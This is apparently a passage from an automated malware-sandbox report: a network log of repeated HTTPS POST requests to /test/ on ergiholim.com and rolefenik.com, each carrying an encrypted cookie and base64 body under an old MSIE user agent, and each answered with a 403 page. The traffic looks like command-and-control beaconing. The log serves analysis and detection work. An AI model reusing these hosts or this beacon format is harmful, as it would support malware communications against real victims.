                                                                                                                                          2024-11-13 17:23:54 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:55 UTC753INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:55 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JMYgdLoiX0qP5bYgaVFC91CmiaK0KH6n%2BOFTwmvgV6tKFNE5nxIUbUvMV0b%2Ffiq6M%2FZcrslMMo6k3ASARwtBHv28TKMr0DBk0eQ%2Boq8OdhdpAQQ2SETT%2BQSYGsyppZlN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073cc8e5e2e25-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1592&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=1728955&cwnd=251&unsent_bytes=0&cid=311b3fcb1717a73b&ts=405&x=0"
                                                                                                                                          2024-11-13 17:23:55 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          93192.168.2.650090104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:56 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:56 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:56 UTC748INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:56 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=thQ1X9%2Bnk11UoQuKmKffgs6LnSXYQBUJbWNJWUtPF2FaeJ1Q2yt9Ot4Gr1NNjQ%2BWW3qbKUEVcIjLa3tPUIOqS0ButxqkoY2zLJ9yOwmrLiTD5gw48%2B25O2rkrFzkd0Hc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073d4ca7dd78b-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=131116&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=22074&cwnd=32&unsent_bytes=0&cid=0be484981a27ec58&ts=534&x=0"
                                                                                                                                          2024-11-13 17:23:56 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          94192.168.2.650091104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:57 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:57 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:57 UTC759INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:57 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nLAydMiW6wq5NX7VyHHxwXVR954BZZN19pr%2Fc73sBI%2Fooac%2Bw2zIH3%2BxnqtVYZwusvyxUn%2BOHt%2B8y%2BeGmPyUSYgMcdHgjhKb4Uwkm2gIIQ%2BFLEXQCIyZ0yhKpxQLJafs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073dc8feb2c92-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1323&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2077474&cwnd=241&unsent_bytes=0&cid=710d166ca75f1c1a&ts=531&x=0"
                                                                                                                                          2024-11-13 17:23:57 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          95192.168.2.650092104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:58 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:58 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:59 UTC754INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:59 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ul3wDHWBtDtV4CecVC%2BthOkAynJZ%2BVUwI2yQHNCmaM3M3UNzqPfHo4sPm2GP2px4nQ2zd6BXPvmdCzdL3pqkf%2Bnz%2FtP9o81hFYCYqmxc4ticF%2By3xW3nVsfa%2F6yAdVY7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073e5cc2ef661-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137741&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=21023&cwnd=32&unsent_bytes=0&cid=754fa116d078c5c9&ts=796&x=0"
                                                                                                                                          2024-11-13 17:23:59 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          96192.168.2.650093104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:24:00 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:24:00 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:24:01 UTC748INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:24:01 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oyVBkPNy41tq298pu4n33CS1Ev%2BnEqwvov1tbJoTlZW%2FNTge1DMj5c4gyx5l2mcBk4DIjkbAkIvqmhhmW%2FKK9QxYFih7W3sGUqWzgShQzOLRfkEQu6bv7NPfCV71VaJ0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073f11e3925fb-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=138192&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20897&cwnd=32&unsent_bytes=0&cid=b5e9611d9260418d&ts=744&x=0"
                                                                                                                                          2024-11-13 17:24:01 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:24:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          97192.168.2.650094104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:24:02 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:24:02 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:24:02 UTC749INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:24:02 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NGtY3IjLAUJPWyE1wcH3yqVlbnrAuxWmh%2B%2FQ10uhPIukqT4Vnr31VlkxbEHcWHOdDp4scBOZp7p4617%2FiRZ1Lozx28cJeidDuygO60zpYrapfQUZdEKrrlEQejZUWDAE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073f918922ccb-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1575&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=1960731&cwnd=114&unsent_bytes=0&cid=f174f0bd30c35b1b&ts=732&x=0"
                                                                                                                                          2024-11-13 17:24:02 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:24:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          98192.168.2.650095104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:24:03 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:24:03 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:24:04 UTC760INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:24:04 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=77Yn8nPOS%2BnC%2BOaDiM2kr1yN5VP9DXBfkemMJ%2Ba%2BB8%2BXcj1T8yTIEFb%2FewfIpdU95t9DVnG5tuzFaf%2B9m1WQ9X6WDYhpW9%2B6EsZKY4Nb4YfkIyMX7zJBvjiB4qVl%2Fj4Z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207403981bd791-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=132759&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=19707&cwnd=32&unsent_bytes=0&cid=3e8c045f2fe6e30b&ts=876&x=0"
